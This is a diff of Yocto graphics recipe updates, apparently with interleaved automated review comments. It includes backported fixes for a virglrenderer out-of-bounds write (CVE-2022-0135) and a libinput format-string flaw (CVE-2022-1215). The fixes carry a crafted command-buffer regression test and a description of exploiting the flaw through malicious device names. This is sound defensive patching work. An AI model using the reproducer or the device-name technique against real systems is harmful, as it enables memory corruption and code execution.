2DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \ 2DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \
3implementations." 3implementations."
4HOMEPAGE = "https://gitlab.freedesktop.org/mesa/piglit"
5BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
4LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause" 6LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
5LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0" 7LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
6 8
7SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \ 9SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \
8 file://0001-cmake-install-bash-completions-in-the-right-place.patch \ 10 file://0001-cmake-install-bash-completions-in-the-right-place.patch \
9 file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \ 11 file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
12 file://0001-Add-a-missing-include-for-htobe32-definition.patch \
13 file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \
14 file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \
15 file://0001-serializer.py-make-.gz-files-reproducible.patch \
16 file://0001-framework-profile.py-make-test-lists-reproducible.patch \
17 file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \
10 " 18 "
11UPSTREAM_CHECK_COMMITS = "1" 19UPSTREAM_CHECK_COMMITS = "1"
12 20
13SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813" 21SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985"
14# (when PV goes above 1.0 remove the trailing r) 22# (when PV goes above 1.0 remove the trailing r)
15PV = "1.0+gitr${SRCPV}" 23PV = "1.0+gitr${SRCPV}"
16 24
@@ -35,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/"
35PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}" 43PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}"
36PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut," 44PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut,"
37PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}" 45PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}"
46PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader"
38 47
48export PIGLIT_BUILD_DIR = "../../../../git"
39 49
40do_configure_prepend() { 50do_configure_prepend() {
41 if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then 51 if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then
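Review bot: `export PIGLIT_BUILD_DIR = "../../../../git"` is added without a comment, and the four-level relative path resolves only while the directory it is evaluated from keeps its current depth below `${WORKDIR}`. A line such as `# relative on purpose: an absolute build path here would end up in the generated files` would tell the next maintainer not to replace it with `${S}`, assuming that is the reason, as the reproducibility patches added to `SRC_URI` above suggest. `do_configure_prepend` continues outside the hunk.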
diff --git a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
index d10bddb529..f69e4838f4 100644
--- a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
+++ b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
@@ -1,6 +1,9 @@
1SUMMARY = "Enables monitoring and display of application startup" 1SUMMARY = "Enables monitoring and display of application startup"
2DESCRIPTION = "Contains a reference implementation of the startup notification protocol. \
3The reference implementation is mostly under an X Window System style license, and has \
4no special dependencies. "
2HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/" 5HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/"
3BUGTRACKER = "https://bugs.freedesktop.org/enter_bug.cgi?product=Specifications" 6BUGTRACKER = "https://gitlab.freedesktop.org/xdg/startup-notification/-/issues"
4 7
5# most files are under MIT, but libsn/sn-util.c is under LGPL, the 8# most files are under MIT, but libsn/sn-util.c is under LGPL, the
6# effective license is LGPL 9# effective license is LGPL
diff --git a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
index 3e1ba196b5..b75bd4c51d 100644
--- a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
+++ b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
@@ -1,4 +1,5 @@
1SUMMARY = "The Bitstream Vera fonts - TTF Edition" 1SUMMARY = "The Bitstream Vera fonts - TTF Edition"
2HOMEPAGE = "https://www.gnome.org/fonts/"
2DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \ 3DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \
3faces (normal, oblique, bold, bold oblique) and two serif faces (normal \ 4faces (normal, oblique, bold, bold oblique) and two serif faces (normal \
4and bold). In addition Fontconfig/Xft2 can artificially oblique the \ 5and bold). In addition Fontconfig/Xft2 can artificially oblique the \
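--- /dev/null
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
@@ -0,0 +1,100 @@
+From 95e581fd181b213c2ed7cdc63f2abc03eaaa77ec Mon Sep 17 00:00:00 2001
+From: Gert Wollny <gert.wollny@collabora.com>
+Date: Tue, 30 Nov 2021 10:17:26 +0100
+Subject: [PATCH] vrend: Add test to resource OOB write and fix it
+
+v2: Also check that no depth != 1 has been send when none is due
+
+Closes: #250
+Signed-off-by: Gert Wollny <gert.wollny@collabora.com>
+Reviewed-by: Chia-I Wu <olvaffe@gmail.com>
+
+https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/95e581fd181b213c2ed7cdc63f2abc03eaaa77ec
+Upstream-Status: Backport
+CVE: CVE-2022-0135
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/vrend_renderer.c | 3 +++
+ tests/test_fuzzer_formats.c | 43 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 46 insertions(+)
+
+diff --git a/src/vrend_renderer.c b/src/vrend_renderer.c
+index 28f669727..357b81b20 100644
+--- a/src/vrend_renderer.c
++++ b/src/vrend_renderer.c
+@@ -7833,8 +7833,11 @@ static int vrend_renderer_transfer_write_iov(struct vrend_context *ctx,
+ info->box->height) * elsize;
+ if (res->target == GL_TEXTURE_3D ||
+ res->target == GL_TEXTURE_2D_ARRAY ||
++ res->target == GL_TEXTURE_2D_MULTISAMPLE_ARRAY ||
+ res->target == GL_TEXTURE_CUBE_MAP_ARRAY)
+ send_size *= info->box->depth;
++ else if (need_temp && info->box->depth != 1)
++ return EINVAL;
+
+ if (need_temp) {
+ data = malloc(send_size);
+diff --git a/tests/test_fuzzer_formats.c b/tests/test_fuzzer_formats.c
+index 59d6fb671..2de9a9a3f 100644
+--- a/tests/test_fuzzer_formats.c
++++ b/tests/test_fuzzer_formats.c
+@@ -957,6 +957,48 @@ static void test_vrend_set_signle_abo_heap_overflow() {
+ virgl_renderer_submit_cmd((void *) cmd, ctx_id, 0xde);
+ }
+
++/* Test adapted from yaojun8558363@gmail.com:
++ * https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/250
++*/
++static void test_vrend_3d_resource_overflow() {
++
++ struct virgl_renderer_resource_create_args resource;
++ resource.handle = 0x4c474572;
++ resource.target = PIPE_TEXTURE_2D_ARRAY;
++ resource.format = VIRGL_FORMAT_Z24X8_UNORM;
++ resource.nr_samples = 2;
++ resource.last_level = 0;
++ resource.array_size = 3;
++ resource.bind = VIRGL_BIND_SAMPLER_VIEW;
++ resource.depth = 1;
++ resource.width = 8;
++ resource.height = 4;
++ resource.flags = 0;
++
++ virgl_renderer_resource_create(&resource, NULL, 0);
++ virgl_renderer_ctx_attach_resource(ctx_id, resource.handle);
++
++ uint32_t size = 0x400;
++ uint32_t cmd[size];
++ int i = 0;
++ cmd[i++] = (size - 1) << 16 | 0 << 8 | VIRGL_CCMD_RESOURCE_INLINE_WRITE;
++ cmd[i++] = resource.handle;
++ cmd[i++] = 0; // level
++ cmd[i++] = 0; // usage
++ cmd[i++] = 0; // stride
++ cmd[i++] = 0; // layer_stride
++ cmd[i++] = 0; // x
++ cmd[i++] = 0; // y
++ cmd[i++] = 0; // z
++ cmd[i++] = 8; // w
++ cmd[i++] = 4; // h
++ cmd[i++] = 3; // d
++ memset(&cmd[i], 0, size - i);
++
++ virgl_renderer_submit_cmd((void *) cmd, ctx_id, size);
++}
++
++
+ int main()
+ {
+ initialize_environment();
+@@ -979,6 +1021,7 @@ int main()
+ test_cs_nullpointer_deference();
+ test_vrend_set_signle_abo_heap_overflow();
+
++ test_vrend_3d_resource_overflow();
+
+ virgl_renderer_context_destroy(ctx_id);
+ virgl_renderer_cleanup(&cookie);
+--
+GitLab
+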
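Review bot: In `test_vrend_3d_resource_overflow` the call `memset(&cmd[i], 0, size - i)` passes an element count where a byte count is expected, so only about a quarter of the remaining `uint32_t` payload is zeroed and the rest of `cmd` is submitted uninitialised, which makes the regression test non-deterministic. It should read `memset(&cmd[i], 0, (size - i) * sizeof(cmd[0]));`. `resource` is also filled field by field, so any member not listed stays indeterminate; `struct virgl_renderer_resource_create_args resource = {0};` avoids that. In vrend_renderer.c the new `EINVAL` return is taken only when `need_temp` is set; whether a `depth != 1` box on the other path is bounded elsewhere is not visible in the hunk, and the function continues outside it.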
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 1046b8504f..8185d6f7e8 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,9 +10,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
10 10
11DEPENDS = "libdrm mesa libepoxy" 11DEPENDS = "libdrm mesa libepoxy"
12SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985" 12SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
13SRC_URI = "git://anongit.freedesktop.org/virglrenderer \ 13SRC_URI = "git://anongit.freedesktop.org/git/virglrenderer;branch=master \
14 file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \ 14 file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
15 file://0001-meson.build-use-python3-directly-for-python.patch \ 15 file://0001-meson.build-use-python3-directly-for-python.patch \
16 file://CVE-2022-0135.patch \
16 " 17 "
17 18
18S = "${WORKDIR}/git" 19S = "${WORKDIR}/git"
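Review bot: The updated `SRC_URI` gains `branch=master` but no `protocol=` parameter, so this fetch stays on the `git://` transport while the other git recipes touched in this change add `protocol=https`. The pinned `SRCREV` limits what a tampered transport could deliver, but an authenticated transport is still preferable where the host offers one. If anongit.freedesktop.org serves this repository over https, append `;protocol=https` here for consistency.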
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64d..0774f37e31 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
8 8
9DEPENDS = "zlib" 9DEPENDS = "zlib"
10 10
11SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \ 11SRC_URI = "git://github.com/assimp/assimp.git;nobranch=1;protocol=https \
12 file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \ 12 file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
13 file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \ 13 file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
14 " 14 "
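Review bot: Replacing `branch=assimp_5.0_release` with `nobranch=1` turns off the fetcher's check that the pinned revision is reachable from a named branch, and the hunk gives no reason for it. A comment above `SRC_URI`, e.g. `# nobranch=1: the release branch is no longer available upstream` (if that is the cause), would record why the check was dropped. It should also state that `SRCREV`, which sits outside the hunk, is now the only thing tying the fetch to a known revision.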
diff --git a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
index c94e768b52..b212814759 100644
--- a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \
8SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf" 8SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf"
9SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd" 9SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd"
10 10
11SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \ 11SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \
12 git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \ 12 git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \
13 git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \ 13 git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \
14 file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \ 14 file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \
15 " 15 "
16UPSTREAM_CHECK_COMMITS = "1" 16UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
index 72c29a72a2..c58a801e03 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
@@ -1,11 +1,15 @@
1SUMMARY = "Vulkan Header files and API registry" 1SUMMARY = "Vulkan Header files and API registry"
2DESCRIPTION = "Vulkan is a 3D graphics and compute API providing cross-platform access \
3to modern GPUs with low overhead and targeting realtime graphics applications such as \
4games and interactive media. This package contains the development headers \
5for packages wanting to make use of Vulkan."
2HOMEPAGE = "https://www.khronos.org/vulkan/" 6HOMEPAGE = "https://www.khronos.org/vulkan/"
3BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers" 7BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers"
4SECTION = "libs" 8SECTION = "libs"
5 9
6LICENSE = "Apache-2.0" 10LICENSE = "Apache-2.0"
7LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" 11LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
8SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126" 12SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https"
9 13
10SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84" 14SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84"
11 15
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
index 504cf85a2b..c8352bf31d 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
9 9
10LICENSE = "Apache-2.0" 10LICENSE = "Apache-2.0"
11LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac" 11LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
12SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126" 12SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https"
13SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed" 13SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed"
14 14
15S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
index 2fd61c989a..ec65f11952 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
@@ -1,11 +1,12 @@
1SUMMARY = "Vulkan Utilities and Tools" 1SUMMARY = "Vulkan Utilities and Tools"
2DESCRIPTION = "Assist development by enabling developers to verify their applications correct use of the Vulkan API."
2HOMEPAGE = "https://www.khronos.org/vulkan/" 3HOMEPAGE = "https://www.khronos.org/vulkan/"
3BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools" 4BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools"
4SECTION = "libs" 5SECTION = "libs"
5 6
6LICENSE = "Apache-2.0" 7LICENSE = "Apache-2.0"
7LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" 8LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
8SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126" 9SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https"
9SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0" 10SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0"
10 11
11S = "${WORKDIR}/git" 12S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
index a620295978..f0dc780ca1 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.0.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
@@ -1,13 +1,21 @@
1SUMMARY = "cross-platform C library to defer selection of GL API and of window system" 1SUMMARY = "A C library for selecting an OpenGL API and window system at runtime"
2DESCRIPTION = "A cross-platform C library that allows one to defer selection \
3of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
4enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
5Wayland with OpenGL ES2, and other window system / API combinations."
6HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
7BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
2LICENSE = "BSD-2-Clause" 8LICENSE = "BSD-2-Clause"
3LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \ 9LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
4 file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf" 10 file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
5 11
6SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz" 12SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2"
7SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7" 13SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942"
8SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7" 14SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb"
9 15
10UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html" 16S = "${WORKDIR}/${BPN}-v${PV}"
17
18UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases"
11 19
12inherit meson features_check lib_package bash-completion 20inherit meson features_check lib_package bash-completion
13 21
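Review bot: The new `SRC_URI` points at a GitLab `-/archive/` URL, which is a tarball generated by the forge rather than an uploaded release artefact, so the `sha256sum` pinned here holds only while the forge keeps producing byte-identical archives. A later checksum mismatch should be handled as a verification event, with the new archive compared against the tagged tree before the hashes are updated, not as a routine refresh. A comment such as `# forge-generated archive: verify contents against the v${PV} tag before changing checksums` would capture that. Alternatively the recipe could fetch by git with a pinned `SRCREV`, as the piglit recipe in this change does.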
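--- /dev/null
+++ b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
@@ -0,0 +1,360 @@
+From 2a8b8fde90d63d48ce09ddae44142674bbca1c28 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Mar 2022 09:25:22 +1000
+Subject: [PATCH] evdev: strip the device name of format directives
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes a format string vulnerabilty.
+
+evdev_log_message() composes a format string consisting of a fixed
+prefix (including the rendered device name) and the passed-in format
+buffer. This format string is then passed with the arguments to the
+actual log handler, which usually and eventually ends up being printf.
+
+If the device name contains a printf-style format directive, these ended
+up in the format string and thus get interpreted correctly, e.g. for a
+device "Foo%sBar" the log message vs printf invocation ends up being:
+ evdev_log_message(device, "some message %s", "some argument");
+ printf("event9 - Foo%sBar: some message %s", "some argument");
+
+This can enable an attacker to execute malicious code with the
+privileges of the process using libinput.
+
+To exploit this, an attacker needs to be able to create a kernel device
+with a malicious name, e.g. through /dev/uinput or a Bluetooth device.
+
+To fix this, convert any potential format directives in the device name
+by duplicating percentages.
+
+Pre-rendering the device to avoid the issue altogether would be nicer
+but the current log level hooks do not easily allow for this. The device
+name is the only user-controlled part of the format string.
+
+A second potential issue is the sysname of the device which is also
+sanitized.
+
+This issue was found by Albin Eldstål-Ahrens and Benjamin Svensson from
+Assured AB, and independently by Lukas Lamster.
+
+Fixes #752
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+(cherry picked from commit a423d7d3269dc32a87384f79e29bb5ac021c83d1)
+
+CVE: CVE-2022-1215
+Upstream Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ meson.build | 1 +
+ src/evdev.c | 31 +++++++++++------
+ src/evdev.h | 6 ++--
+ src/util-strings.h | 30 ++++++++++++++++
+ test/litest-device-format-string.c | 56 ++++++++++++++++++++++++++++++
+ test/litest.h | 1 +
+ test/test-utils.c | 26 ++++++++++++++
+ 7 files changed, 139 insertions(+), 12 deletions(-)
+ create mode 100644 test/litest-device-format-string.c
+
+diff --git a/meson.build b/meson.build
+index 90f528e6..1f6159e7 100644
+--- a/meson.build
++++ b/meson.build
+@@ -787,6 +787,7 @@
+ 'test/litest-device-dell-canvas-totem-touch.c',
+ 'test/litest-device-elantech-touchpad.c',
+ 'test/litest-device-elan-tablet.c',
++ 'test/litest-device-format-string.c',
+ 'test/litest-device-generic-singletouch.c',
+ 'test/litest-device-gpio-keys.c',
+ 'test/litest-device-huion-pentablet.c',
+diff --git a/src/evdev.c b/src/evdev.c
+index 6d81f58f..d1c35c07 100644
+--- a/src/evdev.c
++++ b/src/evdev.c
+@@ -2356,19 +2356,19 @@ evdev_device_create(struct libinput_seat *seat,
+ struct libinput *libinput = seat->libinput;
+ struct evdev_device *device = NULL;
+ int rc;
+- int fd;
++ int fd = -1;
+ int unhandled_device = 0;
+ const char *devnode = udev_device_get_devnode(udev_device);
+- const char *sysname = udev_device_get_sysname(udev_device);
++ char *sysname = str_sanitize(udev_device_get_sysname(udev_device));
+
+ if (!devnode) {
+ log_info(libinput, "%s: no device node associated\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ if (udev_device_should_be_ignored(udev_device)) {
+ log_debug(libinput, "%s: device is ignored\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ /* Use non-blocking mode so that we can loop on read on
+@@ -2382,13 +2382,15 @@ evdev_device_create(struct libinput_seat *seat,
+ sysname,
+ devnode,
+ strerror(-fd));
+- return NULL;
++ goto err;
+ }
+
+ if (!evdev_device_have_same_syspath(udev_device, fd))
+ goto err;
+
+ device = zalloc(sizeof *device);
++ device->sysname = sysname;
++ sysname = NULL;
+
+ libinput_device_init(&device->base, seat);
+ libinput_seat_ref(seat);
+@@ -2411,6 +2413,9 @@ evdev_device_create(struct libinput_seat *seat,
+ device->dispatch = NULL;
+ device->fd = fd;
+ device->devname = libevdev_get_name(device->evdev);
++ /* the log_prefix_name is used as part of a printf format string and
++ * must not contain % directives, see evdev_log_msg */
++ device->log_prefix_name = str_sanitize(device->devname);
+ device->scroll.threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction_lock_threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction = 0;
+@@ -2238,9 +2238,14 @@
+ return device;
+
+ err:
+- close_restricted(libinput, fd);
+- if (device)
+- evdev_device_destroy(device);
++ if (fd >= 0) {
++ close_restricted(libinput, fd);
++ if (device) {
++ unhandled_device = device->seat_caps == 0;
++ evdev_device_destroy(device);
++ }
++ }
++ free(sysname);
+
+ return unhandled_device ? EVDEV_UNHANDLED_DEVICE : NULL;
+ }
+@@ -2469,7 +2478,7 @@ evdev_device_get_output(struct evdev_device *device)
+ const char *
+ evdev_device_get_sysname(struct evdev_device *device)
+ {
+- return udev_device_get_sysname(device->udev_device);
++ return device->sysname;
+ }
+
+ const char *
+@@ -3066,6 +3075,8 @@ evdev_device_destroy(struct evdev_device *device)
+ if (device->base.group)
+ libinput_device_group_unref(device->base.group);
+
++ free(device->log_prefix_name);
++ free(device->sysname);
+ free(device->output_name);
+ filter_destroy(device->pointer.filter);
+ libinput_timer_destroy(&device->scroll.timer);
+diff --git a/src/evdev.h b/src/evdev.h
+index c7d130f8..980c5943 100644
+--- a/src/evdev.h
++++ b/src/evdev.h
+@@ -169,6 +169,8 @@ struct evdev_device {
+ struct udev_device *udev_device;
+ char *output_name;
+ const char *devname;
++ char *log_prefix_name;
++ char *sysname;
+ bool was_removed;
+ int fd;
+ enum evdev_device_seat_capability seat_caps;
+@@ -786,7 +788,7 @@ evdev_log_msg(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+@@ -824,7 +826,7 @@ evdev_log_msg_ratelimit(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+diff --git a/src/util-strings.h b/src/util-strings.h
+index 2a15fab3..d5a84146 100644
+--- a/src/util-strings.h
++++ b/src/util-strings.h
+@@ -42,6 +42,7 @@
+ #ifdef HAVE_XLOCALE_H
+ #include <xlocale.h>
+ #endif
++#include "util-macros.h"
+
+ #define streq(s1, s2) (strcmp((s1), (s2)) == 0)
+ #define strneq(s1, s2, n) (strncmp((s1), (s2), (n)) == 0)
+@@ -312,3 +313,31 @@
+ free(result);
+ return -1;
+ }
++
++/**
++ * Return a copy of str with all % converted to %% to make the string
++ * acceptable as printf format.
++ */
++static inline char *
++str_sanitize(const char *str)
++{
++ if (!str)
++ return NULL;
++
++ if (!strchr(str, '%'))
++ return strdup(str);
++
++ size_t slen = min(strlen(str), 512);
++ char *sanitized = zalloc(2 * slen + 1);
++ const char *src = str;
++ char *dst = sanitized;
++
++ for (size_t i = 0; i < slen; i++) {
++ if (*src == '%')
++ *dst++ = '%';
++ *dst++ = *src++;
++ }
++ *dst = '\0';
++
++ return sanitized;
++}
+diff --git a/test/litest-device-format-string.c b/test/litest-device-format-string.c
+new file mode 100644
+index 00000000..aed15db4
+--- /dev/null
++++ b/test/litest-device-format-string.c
+@@ -0,0 +1,56 @@
++
++/*
++ * Copyright © 2013 Red Hat, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
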